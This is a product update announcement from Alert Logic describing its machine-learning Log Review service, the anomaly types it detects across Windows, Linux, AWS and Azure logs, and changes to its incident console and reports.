Alert Logic® Machine Learning Log Review allows Professional and Enterprise Managed Detection & Response and Cloud Defender customers and partners to continue to meet log review compliance requirements while also receiving new security value. Machine Learning Log Review pairs machine learning and experts to more effectively detect log-based incidents based on your organization's trends and patterns at the account, user, and host levels within machine learning capabilities and provide guidance, custom tuning, and manual checks via our expert teams. In addition, Log Review now supports detection of anomalous activities in Microsoft Azure environments.
This update also includes enhancements to Alert Logic console incident features, which improve the capability for customers to efficiently review data and quickly identify what information is important to them, and new and updated reports.
Benefits of Machine Learning Log Review
Previously, Log Review utilized a fixed anomaly-type trigger and human review to identify anomalies. With machine learning-powered Log Review, Alert Logic utilizes a machine learning-trained threshold that is customized for each customer and considers relative high message count, unusual location, and unusual hostnames, while experts handle special customer requests.
Several benefits of the machine learning model for reviewing logs include:
- Faster and more efficient review
- A dramatic expansion of anomalies detection capabilities
- Improved accuracy
- Increased machine learning-based detection from a previous six UBAD-based detection to now 100+ anomaly scenarios based on time series, location, and unusual names
- Rule-based detection that utilizes customer preferences
- Significantly more security value
- Detection of any anomalies automatically and reliably based on customer data trends
New Log Review Experience
Log Review details are now classified as incidents and can be found within the Alert Logic console at (navigation menu) > Respond> Incidents. You can filter to view only Log Review information by clicking Log Review under Detection Source in the left-hand filter bar. Incident classification of Log Review incidents, titled Log Review Summary incidents, has changed and now includes:
- Threat Level: Info
- Escalation: Not escalated
- Classification: Log Review
Each day, one Log Review Summary incident will be raised, if there are any log anomalies detected in the customer environment by the machine learning models. Machine Learning log anomaly detection incorporates automation of all anomaly-based detection for Windows, UNIX/Linux, Amazon Web Services (AWS), Microsoft Azure, Network, and database logs and rule-based detection for Windows and UNIX/Linux logs. Examples of log data that Alert Logic reviews include:
- Windows: Failed logins, changes to privileges, changes to accounts, Active Directory global catalog changes, and others
- UNIX/Linux: Sudo access, SSH failed logins, switched user common success/fails, and others
- AWS: MFA, security group changes, IAM, EC2, S3 changes, user account and access changes, network control changes, and others
- Azure: Backup, user file access, user login activity, user network security events, OAuth2 grant activity, object access, user role modification activity, service principal activity, user file access, user group modification.
Incident details contain the list of anomalous users and hosts that received anomalies, as well as the different types of alerts triggered, based on the log anomaly aggregation. On the incident Evidence page, you will find additional information around the Log Review anomaly type summary, user summary, and host summary. Two machine learning detection techniques can trigger an anomaly:
- Anomaly detection: Anomalies are triggered based on the machine learning model computed for the user or host; no specific logs will be listed as evidence within a Log Review Summary incident.
- Pattern matching: Logs associated to a suspicious command or IP address will trigger an anomaly; these logs will be listed within the Log Review Summary incident evidence.
User Experience Changes
Customers will experience some changes associated with Log Review notifications and incidents based on their service level.
Cloud Defender Customers
Cloud Defender customers, including Log Manager customers with Log Review and Threat and Log Manager customers, will notice a new user experience when navigating and managing incidents. Previously, Cloud Defender customers could find Log Review cases within the Alert Logic console at Search > Cases. Log Review information is now found within Respond > Incidents. Customers will now receive one new Log Review Summary incident a day for Windows, LINUX, AWS, Azure, network, and database log activity that provides new information such as user- and host-level anomaly incident evidence, as well as up to 16 case-based Log Review incidents.
Managed Detection & Response Customers
Managed Detection & Response customers can find Log Review information where they have always found it, at Respond > Incidents. Customers will now receive one new Log Review Summary incident a day for Windows, LINUX, AWS, Azure, network, and database log activity that provides new information such as user- and host-level anomaly incident evidence, as well as up to 16 case-based Log Review incidents.
Incident Console Enhancements
Several improvements have been made to the Incident console—found within the Alert Logic console at Respond > Incidents—to support both the new Log Review Summary incident configuration and comprehensive customer consumption of their most important incident information.
The Incident List column structure has been enhanced to provide users with more information at-a-glance. In this vein, you can choose which columns you want to appear in your Incident List table, as well as drag, resize, and sort each column. A preview panel to the table’s right shows additional information around the incident at the top of your screen and will change as you scroll.
Status and other filters are available for multi-selection and very granular filtering, and these can be reset quickly by clicking Clear All Filters above the filters. You can also download all incidents that match your current filters to CSV.
Note: To see only Log Review Summary incidents, filter only for Log Review under Detection Source.
To see more information on an incident, click on the incident in the Incident List table to access the Incident Detail page. Investigation and Recommendation information have been combined into one panel, which provide an attack summary, an overview of log alerts and anomalies, a recommended course of action, and audit log and notification history.
The Evidence page contains a timeline of all notable occurrences regarding the incident and allows you to dig into each piece of evidence for more granular data. Machine learning-generated Log Review Summary incidents contain three tiers of analytics, and customers can review top-level incident details like alert types, alert counts, anomalous users, and anomalous hosts, as well as drill down into any piece of evidence for more layers of observations and evidence.
New and improved incident reports are available for Cloud Defender and Managed Detection & Response customers.
Incident Daily Digest
The Incident Daily Digest report houses new graphical data on the last 30 days of incidents, as well as a list of incidents and summary information. From the report, you can easily dig into more detailed information within the Alert Logic console. This report will be received daily, so long as incidents have been generated that day. The Incident Daily Digest report can be found in the Alert Logic console at Validate > Reports > Threats > Incident Analysis > Incident Daily Digest.
Monthly Log Review Report
The Monthly Log Review report is now available to both Cloud Defender and Managed Detection & Response customers, where once it was not available to Cloud Defender customers. This report houses new graphical data on the last 30 days of log review related incidents, as well as additional statistics. The Monthly Log Review Report can be found in the Alert Logic console at Validate > Reports > Threats > Log Review Analysis > Monthly Log Review.
For additional technical details, see the Alert Logic Documentation: